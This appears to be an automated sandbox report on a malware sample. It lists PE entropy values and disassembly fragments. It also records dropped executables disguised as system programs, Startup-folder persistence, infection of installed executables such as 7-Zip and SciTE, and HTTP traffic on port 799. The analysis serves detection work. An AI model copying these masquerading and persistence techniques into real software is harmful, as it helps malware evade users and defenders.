Source: Microsoft Corporation.exe.4.dr	Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name: du
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name: du
Source: Explower.exe0.4.dr	Static PE information: section name:
Source: Explower.exe0.4.dr	Static PE information: section name:
Source: Explower.exe0.4.dr	Static PE information: section name:
Source: Explower.exe0.4.dr	Static PE information: section name: du
Source: Explower.exe1.4.dr	Static PE information: section name:
Source: Explower.exe1.4.dr	Static PE information: section name:
Source: Explower.exe1.4.dr	Static PE information: section name:
Source: Explower.exe1.4.dr	Static PE information: section name: du
Source: Explower.exe2.4.dr	Static PE information: section name:
Source: Explower.exe2.4.dr	Static PE information: section name:
Source: Explower.exe2.4.dr	Static PE information: section name:
Source: Explower.exe2.4.dr	Static PE information: section name: du
Source: Explower.exe3.4.dr	Static PE information: section name:
Source: Explower.exe3.4.dr	Static PE information: section name:
Source: Explower.exe3.4.dr	Static PE information: section name:
Source: Explower.exe3.4.dr	Static PE information: section name: du
Source: Explower.exe4.4.dr	Static PE information: section name:
Source: Explower.exe4.4.dr	Static PE information: section name:
Source: Explower.exe4.4.dr	Static PE information: section name:
Source: Explower.exe4.4.dr	Static PE information: section name: du
Source: Explower.exe5.4.dr	Static PE information: section name:
Source: Explower.exe5.4.dr	Static PE information: section name:
Source: Explower.exe5.4.dr	Static PE information: section name:
Source: Explower.exe5.4.dr	Static PE information: section name: du
Source: Explower.exe6.4.dr	Static PE information: section name:
Source: Explower.exe6.4.dr	Static PE information: section name:
Source: Explower.exe6.4.dr	Static PE information: section name:
Source: Explower.exe6.4.dr	Static PE information: section name: du
Source: Explower.exe7.4.dr	Static PE information: section name:
Source: Explower.exe7.4.dr	Static PE information: section name:
Source: Explower.exe7.4.dr	Static PE information: section name:
Source: Explower.exe7.4.dr	Static PE information: section name: du
Source: Explower.exe8.4.dr	Static PE information: section name:
Source: Explower.exe8.4.dr	Static PE information: section name:
Source: Explower.exe8.4.dr	Static PE information: section name:
Source: Explower.exe8.4.dr	Static PE information: section name: du
Source: system.exe.4.dr	Static PE information: section name:
Source: system.exe.4.dr	Static PE information: section name:
Source: system.exe.4.dr	Static PE information: section name:
Source: system.exe.4.dr	Static PE information: section name: du
Source: Notepad.exe.4.dr	Static PE information: section name:
Source: Notepad.exe.4.dr	Static PE information: section name:
Source: Notepad.exe.4.dr	Static PE information: section name:
Source: Notepad.exe.4.dr	Static PE information: section name: du

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006382D8 push ecx; mov dword ptr [esp], eax	0_2_006382D9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0062447A push 006244A8h; ret	0_2_006244A0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006244EC push 00624518h; ret	0_2_00624510
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006244B4 push 006244E0h; ret	0_2_006244D8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00624524 push 00624550h; ret	0_2_00624548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0063853C push ecx; mov dword ptr [esp], edx	0_2_00638541
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0062C5A8 push 0062C754h; ret	0_2_0062C74C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00624588 push 006245BCh; ret	0_2_006245B4
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00622630 push 00622681h; ret	0_2_00622679
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00638764 push ecx; mov dword ptr [esp], edx	0_2_00638769
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0062C756 push 0062C7C7h; ret	0_2_0062C7BF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006357D8 push 00635838h; ret	0_2_00635830
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006228EA push 00622918h; ret	0_2_00622910
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006388C4 push ecx; mov dword ptr [esp], edx	0_2_006388C9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0062C8DA push 0062C908h; ret	0_2_0062C900
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00638880 push ecx; mov dword ptr [esp], edx	0_2_00638885
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0063688C push 006368D9h; ret	0_2_006368D1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0063496E push 006349EDh; ret	0_2_006349E5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006339C0 push 00633A36h; ret	0_2_00633A2E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_006229A8 push 006229D4h; ret	0_2_006229CC
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00633A38 push 00633AE0h; ret	0_2_00633AD8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00633AE2 push 00633B30h; ret	0_2_00633B28
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00623AC8 push ecx; mov dword ptr [esp], eax	0_2_00623AC9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00635ABC push ecx; mov dword ptr [esp], ecx	0_2_00635ABF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00634C3C push 00634C68h; ret	0_2_00634C60
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00623D72 push 00623DA0h; ret	0_2_00623D98
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00635D2C push ecx; mov dword ptr [esp], ecx	0_2_00635D2E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0062BDDC push ecx; mov dword ptr [esp], edx	0_2_0062BDE1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00623DAC push 00623DD8h; ret	0_2_00623DD0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_00623ED4 push 00623F00h; ret	0_2_00623EF8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_0061EFD8 push eax; ret	0_2_0061F014

Source: LisectAVT_2403002B_366.exe	Static PE information: section name: entropy: 7.976487863015766
Source: LisectAVT_2403002B_366.exe	Static PE information: section name: .data entropy: 7.970274705878334
Source: LisectAVT_2403002B_366.exe	Static PE information: section name: du entropy: 6.934584666735054
Source: server.exe.0.dr	Static PE information: section name: entropy: 7.976487863015766
Source: server.exe.0.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: server.exe.0.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: RRqyIX.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934446577355295
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.934784069858757
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.933741776560137
Source: Explower.exe.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe0.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe0.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe0.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe1.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe1.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe1.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe2.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe2.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe2.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe3.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe3.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe3.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe4.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe4.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe4.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe5.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe5.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe5.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe6.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe6.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe6.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe7.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe7.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe7.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe8.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe8.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe8.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: system.exe.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: system.exe.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: system.exe.4.dr	Static PE information: section name: du entropy: 6.934584666735054
Source: Notepad.exe.4.dr	Static PE information: section name: entropy: 7.976487863015766
Source: Notepad.exe.4.dr	Static PE information: section name: .data entropy: 7.970274705878334
Source: Notepad.exe.4.dr	Static PE information: section name: du entropy: 6.934584666735054

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\AppData\Local\Temp\server.exe

File created: C:\Users\user\Documents\Explower.exe

Jump to dropped file

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	File created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\system.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	File created: C:\Users\user\AppData\Local\Temp\server.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Notepad.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\Documents\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Windows\SysWOW64\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\Favorites\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Local\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\History\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Program Files (x86)\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\Desktop\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\server.exe

File created: C:\Program Files (x86)\Explower.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\server.exe

File created: C:\Windows\SysWOW64\Explower.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\server.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
